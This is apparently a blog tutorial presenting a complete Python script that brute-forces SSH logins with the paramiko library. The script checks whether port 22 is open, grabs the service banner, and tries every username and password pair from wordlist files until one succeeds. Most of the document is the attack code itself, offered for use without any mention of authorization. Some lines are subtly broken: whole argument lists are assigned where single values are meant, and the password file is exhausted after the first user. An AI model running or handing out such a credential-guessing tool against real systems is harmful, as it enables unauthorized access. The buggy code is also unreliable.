This article will guide you to use paramiko library in Python to create an SSH bruteforcing Script. This script is similar to the script we have made on PXSSH, in case you haven’t seen that post, here is the link:
If you want to see the usage of paramiko before going through the below script, here is the link:
The code has following functions:
file function which opens the user and password file to read and passes the user and password value to bruteforcing script in loop.
Scan function which scans the host if port 22 is open and grab the banner.
Param_ssh function which makes connection with the SSH,changes the value of found variable if username and password is correct.
Check function enters the program to check whether the number of arguments are correct or not. If arguments are sufficient, it runs other functions in the script.
**NOTE: I have used break in the for loop so that the script stops right when it finds a correct combination, you can remove break so the script will loop through all possible combinations.
#!/usr/bin/python import paramiko import socket import sys #function that runs the paramiko, checks the user and password combination def param_ssh(ip,user,passw): global found #found global variable client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print("[?] Trying:"+"-->"+user+":"+passw) try: client.connect(ip, username=user, password=passw, look_for_keys=False) #if connection is made with user and password the value of found is changed to 1. found=1 except Exception as r: found=0 #if authentication Exception is generated then the value of found remains 0.[Combination incorrect] #function to read the userfile and passfile and passes their values to the param_ssh function. def files_read(ip,userfile,passfile): try: print("*********** [+] Bruteforcer Running********** ") u=open(userfile,'r') p=open(passfile,'r') for uline in u.readlines(): for pline in p.readlines(): param_ssh(ip,uline.rstrip(),pline.rstrip()) #found is the global variable. If user and password are correct then found is not equal to zero. if(found!=0): print("\n[+] User and Password Found:\n"+"username:"+uline+"password:"+pline) break except Exception as f: print(f) u.close() #closes user file p.close() #closes password file #scan function to check the target ip with 22 and grab banner. [Extra Function] def scan(addr,userfile,passfile): try: addr=sys.argv sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) ip=socket.gethostbyname(addr) r=sock.connect_ex((ip,22)) if(r==0): print("TARGET IP: "+ip) print("[+] PORT 22 is open") bann=sock.recv(1024) detailbann=bann.decode('utf-8').strip() print("[+] TARGET BANNER: "+detailbann) files_read(ip,userfile,passfile) else: print("[-] "+addr+" PORT is Closed") exit() except Exception as e: print(e) def check(): if len(sys.argv) < 4: print('Not enough arguments\n>>hostname,username,password required.') else: address=sys.argv userfile=sys.argv passfile=sys.argv scan(address,userfile,passfile) check()